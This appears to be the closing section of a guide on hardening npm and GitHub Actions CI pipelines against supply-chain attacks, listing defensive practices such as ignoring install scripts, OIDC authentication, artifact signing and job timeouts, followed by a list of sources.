- Use npm ci --ignore-scripts. Postinstall hooks are the primary delivery mechanism for npm supply chain attacks. Run npm rebuild for named packages separately, and only for dependencies you have vetted; a bare npm rebuild re-runs every dependency's install scripts.
- Adopt OIDC for cloud authentication. Eliminate long-lived cloud credentials from your CI secrets entirely.
- Pin to head.sha, never head.ref. This closes the TOCTOU window on approval-based workflows.
- Audit your dependency tree. Run npm audit in CI, block merges on high-severity findings, and require npm provenance on published packages.
- Sign your artifacts. Use Sigstore/cosign for container images and npm publish --provenance for packages. Make provenance verification part of your deployment pipeline.
- Set job timeouts. A compromised runner running a crypto miner will run until the 6-hour default. Set timeout-minutes to the minimum your job needs.
Security is not a feature you ship once. It is a property of the system that degrades every time you add a dependency, a contributor, or a workflow step. Audit continuously. Assume compromise. Verify everything.
Sources & Further Reading
- Rafael Gonzaga, "Securing Your Github Actions": comprehensive analysis of GitHub Actions attack vectors including script injection, TOCTOU, and pull_request_target exploits
- Sangchul Lee (1ilsang), "is 패키지의 Supply Chain Attack 과정 분석" (Analysis of the is package supply chain attack): detailed technical analysis of the npm is package supply chain compromise, including obfuscation techniques and payload analysis
- GitHub Security Advisory GHSA-8mgj-vmr8-frr6
- SLSA Framework, slsa.dev/spec/v1.0: Supply-chain Levels for Software Artifacts specification
- Sigstore, docs.sigstore.dev: keyless signing for software supply chain integrity
- GitHub Docs, "Security hardening for GitHub Actions"
- npm Documentation, "Generating provenance statements"